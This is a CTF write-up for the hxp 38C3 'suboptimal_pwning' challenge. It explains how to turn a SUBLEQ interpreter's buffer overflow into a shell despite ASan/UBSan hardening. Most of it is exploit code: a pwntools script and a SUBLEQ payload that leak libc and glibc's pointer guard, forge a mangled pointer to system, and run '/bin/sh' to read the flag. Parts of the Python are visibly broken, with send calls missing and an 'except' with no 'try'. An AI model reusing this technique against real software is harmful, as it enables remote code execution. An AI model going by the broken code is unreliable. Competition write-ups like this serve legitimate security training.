hxp 38C3 CTF: suboptimal_pwning

PWN (667 points, 6 solves)

This post discusses the solution for the suboptimal_pwning challenge.

Challenge overview

The challenge offers a remote service where one can provide their SUBLEQ program to be emulated using the interpreter from [1]. The interpreter has an obvious buffer overflow during program input and program emulation for accesses to the buffer mem. The goal of the challenge is to submit a SUBLEQ program that obtains the flag from the filesystem.

SUBLEQ [3] is a popular single-instruction abstract instruction set [2] that has a single instruction that handles subtraction of values in memory, handles jumps to new memory addresses, and handles input and output for a given memory address. For more details on the SUBLEQ instruction set, [3] gives a good overview.

Normally, the exploit for this challenge would be fairly simple since the mem buffer is allocated on the stack and there’s an arbitrary read and write to stack memory. The typical exploit would be to obtain a libc pointer from stack memory and modify its value to a one-gadget [4], that would then give a remote shell on ret.

The challenge is made more difficult by enabling a plethora of clang compiler hardenings for the binary, that can be seen in the provided Dockerfile.build. I suggest searching the compiler flags on the internet for more details. The more impactful compiler flags are fsanitize=address (AddressSanitizer) and fsanitize=integer (UBSan subset) that add runtime compiler checks for memory accesses and integer arithmetic for the built binary [5] [9]. ASAn instruments the binary program to catch near out-of-bounds accesses to the mem buffer by surrounding the buffer with red zones and using reference shadow memory to determine if the access is allowed. The instrumentation also has the mem buffer to be allocated via __asan_stack_malloc_10 that results in the buffer be allocated in mmap-region instead of the stack. The UBSan-integer checks catch signed integer wrap-arounds and other unintended or undefined behavior [9], that also made the exploit more unstable.

How to exploit?

Since the mem buffer is in the mmap region and there’s no explicit randomization for mappings in the mmap region, except for the mmap region base, the relative offsets between mem and libc can be hardcoded. Note that there may still be noise in the relative offset value due to the behavior of the address space allocator, but the noise is still relatively small (8 bits?). For testing with ASLR disabled, the relative offset of 23531488 touches exactly the base of the libc image when run in the docker container.

Since there is noise in the relative offset value, the exploit would very often fail. To address this, the exploit collects data about the address space and applies a correction to the hardcoded relative offset. First, the SUBLEQ program dumps the first byte of each 4-byte-word starting at the supposed libc base, and then solve.py searches for this pattern in the known libc image. Once the pattern is found, the true relative offset is calculated and sent to the SUBLEQ program from the solve.py script. The absolute libc base address can be obtained by leaking any pointers in libc.

The final step is to corrupt data in libc that will allow spawning a shell, but this requires defeating glibc’s Pointer Encryption [6]. Function pointers in glibc are protected using Pointer Encryption [6] that prevents simply overwriting a glibc pointer with a pointer to a desired function (e.g. system). The code for encrypting a pointer - PTR_MANGLE(var) - is shown in [7], that xors the pointer value with the random value POINTER_GUARD (located at $fs+0x30) and then applies a fixed rotation to the pointer using rol. Since the thread local storage (pointed by $fs) is also located in the mmap region, the SUBLEQ program also obtains the pointer guard value that can then be used for forging pointers usable by libc.

Conveniently, the pointer guard also simplifies finding a suitable pointer to overwrite - just set a read watchpoint on the pointer guard and let the program exit. The read watchpoint will be hit when libc tries to decrypt any pointer in libc before calling it, thus giving away a good pointer to overwrite from the SUBLEQ program.

For coding the SUBLEQ exploit, the sblasm [8] project is used. The project is a SUBLEQ macro assembler that implements convenient macros for memory copies, division, addition and multiplication.

Flag: hxp{1_1nstruct1on_much_pa1n_st111_1nsecure_111e1ns}

Exploit code


#!/usr/bin/env python3

from pwn import *

io = None

# Get the static data for the exploit
with open("./libc_new.so.6", "rb") as f:
    libc_blob = f.read()

with open("./solve.sq", "rb") as f:
    sq_blob = f.read()

def do_pow(s):
    import re, subprocess, time
    m = re.search(r'please give S such that sha256\(unhex\("([0-9a-f]+)" \+ S\)\) ends with ([0-9]+) zero bits', s)
    if m is None:
        raise Exception("Failed to parse pow", f)
    prefix = m.groups()[0]
    difficulty = int(m.groups()[1])
    print(f'[starting PoW... difficulty=\x1b[35m{difficulty}\x1b[0m prefix=\x1b[35m{prefix}\x1b[0m]', file=sys.stderr)
    t0 = time.time()
    sol = subprocess.check_output(['./pow-solver', str(difficulty), prefix]).decode().strip()
    print('[PoW took \x1b[35m{}\x1b[0m seconds ~> \x1b[35m{}\x1b[0m.]'.format(time.time() - t0, sol), file=sys.stderr)
    return sol

def rol(v, off):
    # Necessary for mangling the pointer
    return ((v << off) | (v >> (64 - off))) & ((1 << 64) - 1)

def fix_ptr_offsets(off):
    # No need to send all 4 bytes since the libc binary is ~2MiB
    # and the correction cannot be more than log2(2MiB) that is a
    # bit below 24 bits
    tmp = (off & 0xff0000) >> 16

    tmp = (off & 0xff00) >> 8

    tmp = off & 0xff

def hack():
    global io
    if io:
        io = None

    io = remote(sys.argv[1], int(sys.argv[2]))

    # Do pow
    r = io.readline().decode()
    info(f"POW: {r}")
    sol = do_pow(r)
    info(f"Solution: {sol}")

    # Send the program
    io.readuntil(b"Please give your subleq program: ")


    # Read now the leaked bytes
    # The leaks are the first byte for each 4-byte-long value.
    # The code then checks if the pattern exists in libc and
    # then finds the necessary adjustment to be made to any
    # code that does relative access from the mmap-ed fake stack
    # to libc / fs.
    # The harcoded offset in the sq program is from the libc_base
    # if ASLR is disabled
    n = 256
    leaked_vars = b""
    for _ in range(n):
        leaked_vars += io.recv(1)
    io.recv(1) # \n

    found_off = None
    for u in range(0, len(libc_blob) - 4 * n, 4):
        ok = all(libc_blob[u + v * 4] == leaked_vars[v] for v in range(0, n))
        if ok:
            found_off = u

    assert found_off != None

    info(f"Need to correct by {found_off // 4}")

    # to get this offset, you need to modify the subleq program to cause a crash
    # you can do this, by doing this:
    #   sble IN inp
    #   sble 5882872 OUT
    # Then add an interactive shell after sending the program (somewhere above in the code)
    # Then attach with gdb and send '1' from the interactive shell.
    # The compute the offset (remember to divide by 4)
    libc_offset = 5882872 - found_off // 4
    info(f"libc_offset: {hex(libc_offset)}")

    # Send the correction offset to the sq program
    fix_ptr_offsets(found_off // 4)

    # Get the full ptr guard
    ptr_guard = b""
    while len(ptr_guard) != 8:
        b = io.read(1)
        if b != b"":
            ptr_guard += b
    ptr_guard = int.from_bytes(ptr_guard, 'little')
    info(f"ptr_guard          {hex(ptr_guard)}")

    # Get the libc base
    libc_base = b""
    while len(libc_base) != 8:
        b = io.read(1)
        if b != b"":
            libc_base += b
    libc_base = int.from_bytes(libc_base, 'little')
    libc = libc_base
    info(f"libc               {hex(libc)}")

    # Use system instead of one_gadget since it's more reliable
    system = libc + 0x58740
    info(f"system             {hex(system)}")

    # The demangling code in libc is:
    #   ptr = ror(ptr, 0x11)
    #   ptr ^= ptr_guard
    # The below code just reverses the operation
    mangled_system = rol(system ^ ptr_guard, 0x11)
    info(f"mangled system {hex(mangled_system)}")

    # Send the mangled system ptr that the sq program
    # will then take and overwrite the function ptr with.
    # The ptr is sent from MSB to LSB since that simplified
    # the code for reading and calculating the 32-bit values.
    for i in range(8):
        # print("Write Mangled one_gadget")
        tmp = (mangled_system >> ((7 - i) * 8)) & 0xff
        # print("0x000000XX", hex(tmp))

    # Send the /bin/sh ptr
    binshptr = libc + 0x1cb42f
    for i in range(8):
        # print("Write Mangled one_gadget")
        tmp = (binshptr >> ((7 - i) * 8)) & 0xff
        # print("0x000000XX", hex(tmp))

    # A lot of things can go wrong in the steps above and the
    # program may have died or about to die.
    # There are various reasons for the failure, but they are
    # not well understood:
    # - there are ocassional int overflows that UBSAN catches
    # - the leaked pointers may have an off-by-1 for some bytes
    #   so the exploit will just fail (jump to invalid address)
    # - there was some kind of weird race locally between
    #   sanitizer catching a crash and terminating the program
    #   and the clone() call.
    rcv = io.readline(timeout=10)
    if b"AddressSanitizer" in rcv or b"overflow" in rcv or b"=================================================\n" in rcv or b"DEADLYSIGNAL" in rcv:
         raise Exception("Failed")
    io.sendline(b"cat ./flag.txt")
    flag = io.readuntil(b"}").decode()
    print(f"Flag: {flag}")

# Usually takes ~60 tries
num_tries = 256
for i in range(num_tries):
        info(f"Attempt: {i+1}/{num_tries}")
    except Exception as e:
        info(f"fail: {str(e)}")


.include    "sblasm/arch_linux.inc.asq"
.include    "sblasm/standard.asq"
.include    "sblasm/io.asq"

;           Start
    sble  z z main

; macro to print a 4 byte value
; for some reason, the printed bytes may be off-by-one
scratch: .word 0
.macro sisu_print value
    ; print byte0
    sble tmp tmp
    copy value tmp
    sble tmp OUT

    ; divide by 256 ^ 1 and print byte1
    div #256 tmp
    sble tmp OUT

    ; divide by 256 ^ 2 and print byte1
    div #256 tmp
    sble tmp OUT

    ; divide by 256 ^ 3 and print byte1
    div #256 tmp
    sble tmp OUT


;           Main

    ; Keeping this here because the solve.py expects it

    ; Dump 256 bytes to help the solve.py determine the libc offset correction
    ; Shortcut for generating in the future:
    ;     python3 -c 'print("\n".join([f"sble {5882872 + i} OUT" for i in range(256)]))'

    sble 5882872 OUT
    sble 5882873 OUT
    sble 5882874 OUT
    sble 5882875 OUT
    sble 5882876 OUT
    sble 5882877 OUT
    sble 5882878 OUT
    sble 5882879 OUT
    sble 5882880 OUT
    sble 5882881 OUT
    sble 5882882 OUT
    sble 5882883 OUT
    sble 5882884 OUT
    sble 5882885 OUT
    sble 5882886 OUT
    sble 5882887 OUT
    sble 5882888 OUT
    sble 5882889 OUT
    sble 5882890 OUT
    sble 5882891 OUT
    sble 5882892 OUT
    sble 5882893 OUT
    sble 5882894 OUT
    sble 5882895 OUT
    sble 5882896 OUT
    sble 5882897 OUT
    sble 5882898 OUT
    sble 5882899 OUT
    sble 5882900 OUT
    sble 5882901 OUT
    sble 5882902 OUT
    sble 5882903 OUT
    sble 5882904 OUT
    sble 5882905 OUT
    sble 5882906 OUT
    sble 5882907 OUT
    sble 5882908 OUT
    sble 5882909 OUT
    sble 5882910 OUT
    sble 5882911 OUT
    sble 5882912 OUT
    sble 5882913 OUT
    sble 5882914 OUT
    sble 5882915 OUT
    sble 5882916 OUT
    sble 5882917 OUT
    sble 5882918 OUT
    sble 5882919 OUT
    sble 5882920 OUT
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    sble 5882930 OUT
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    sble 5882944 OUT
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    sble 5883119 OUT
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    sble 5883122 OUT
    sble 5883123 OUT
    sble 5883124 OUT
    sble 5883125 OUT
    sble 5883126 OUT
    sble 5883127 OUT


    ; Read the correction one-byte-at-a-time and then accummulate into the correction memory address
    sble inp inp
    sble IN inp
    std::Mulu #16 inp
    std::Mulu #16 inp
    std::Mulu #16 inp
    std::Mulu #16 inp
    add inp correction

    sble inp inp
    sble IN inp
    std::Mulu #16 inp
    std::Mulu #16 inp
    add inp correction

    sble inp inp
    sble IN inp
    add inp correction

    ; this is here for debugging purposes because then the value
    ; can be always dumped from memory address 0 via gdb - no need to know where the 'correction' variable lives.
    copy correction 0

    ; apply the correction to the offset for the mangled pointer offsset in fsbase
    ; dump least 4 bytes
    copy #5878244 scratch
    sble correction scratch
    copy scratch 2
    copy #1 1
    copy_pp 2 1
    copy 1 scratch
    sisu_print scratch

    ; apply the correction to the offset for the mangled pointer offsset in fsbase
    ; dump top 4 bytes
    copy #5878245 scratch
    sble correction scratch
    copy scratch 2
    copy #1 1
    copy_pp 2 1
    copy 1 scratch
    sisu_print scratch

    ; same procedure but for the address containing a pointer to the libc_base
    copy #5878920 scratch
    sble correction scratch
    copy scratch 2
    copy #1 1
    copy_pp 2 1
    copy 1 scratch
    sisu_print scratch

    copy #5878921 scratch
    sble correction scratch
    copy scratch 2
    copy #1 1
    copy_pp 2 1
    copy 1 scratch
    sisu_print scratch

    ; apply correction to the offset for the first corrutable pointer during program teardown.
    ; to find this address, one can set a read watchpoint to the mangled mask address and then
    ; wait for the first access - this works since the pointer is used only for unmasking pointers
    ; that can be corrupted.
    sble scratch scratch
    copy #6412302 scratch
    sble correction scratch

    ; read the system mangled pointer - first top 4 bytes, then lower 4 bytes
    ; win_1 contains top bytes, win_0 lower bytes
    sble inp inp
    sble IN inp
    std::Mulu #256 inp
    std::Mulu #256 inp
    std::Mulu #256 inp
    add inp win_1

    sble inp inp
    sble IN inp
    std::Mulu #256 inp
    std::Mulu #256 inp
    add inp win_1

    sble inp inp
    sble IN inp
    std::Mulu #256 inp
    add inp win_1

    sble inp inp
    sble IN inp
    add inp win_1

    sble inp inp
    sble IN inp
    std::Mulu #256 inp
    std::Mulu #256 inp
    std::Mulu #256 inp
    add inp win_0

    sble inp inp
    sble IN inp
    std::Mulu #256 inp
    std::Mulu #256 inp
    add inp win_0

    sble inp inp
    sble IN inp
    std::Mulu #256 inp
    add inp win_0

    sble inp inp
    sble IN inp
    add inp win_0

    ; overwrite the libc function ptr
    copy scratch 2
    copy win_0 0
    copy #0 1
    copy_pp 1 2

    add #1 scratch
    copy scratch 2
    copy win_1 0
    copy #0 1
    copy_pp 1 2

    ; read the /bin/sh pointer and write it after the libc function pointer since
    ; that's where the argument is read from before calling the function pointer.
    sble inp inp
    sble IN inp
    std::Mulu #256 inp
    std::Mulu #256 inp
    std::Mulu #256 inp
    add inp s1

    sble inp inp
    sble IN inp
    std::Mulu #256 inp
    std::Mulu #256 inp
    add inp s1

    sble inp inp
    sble IN inp
    std::Mulu #256 inp
    add inp s1

    sble inp inp
    sble IN inp
    add inp s1

    sble inp inp
    sble IN inp
    std::Mulu #256 inp
    std::Mulu #256 inp
    std::Mulu #256 inp
    add inp s0

    sble inp inp
    sble IN inp
    std::Mulu #256 inp
    std::Mulu #256 inp
    add inp s0

    sble inp inp
    sble IN inp
    std::Mulu #256 inp
    add inp s0

    sble inp inp
    sble IN inp
    add inp s0

    add #1 scratch
    copy scratch 2
    copy s0 0
    copy #0 1
    copy_pp 1 2

    add #1 scratch
    copy scratch 2
    copy s1 0
    copy #0 1
    copy_pp 1 2

    ; if some debugging is necessary, the below line can be uncommented and then
    ; one can attach with gdb to the process and set a breapoint to the code
    ; that will call into the function pointer
    ; sble IN tmp

    ; halt to trigger the exploit
    sble  z z HALT

;           Data Storage
tmp:        .word 0
correction: .word 0
inp:        .word 0
win_0:      .word 0
win_1:      .word 0
s0:         .word 0
s1:         .word 0
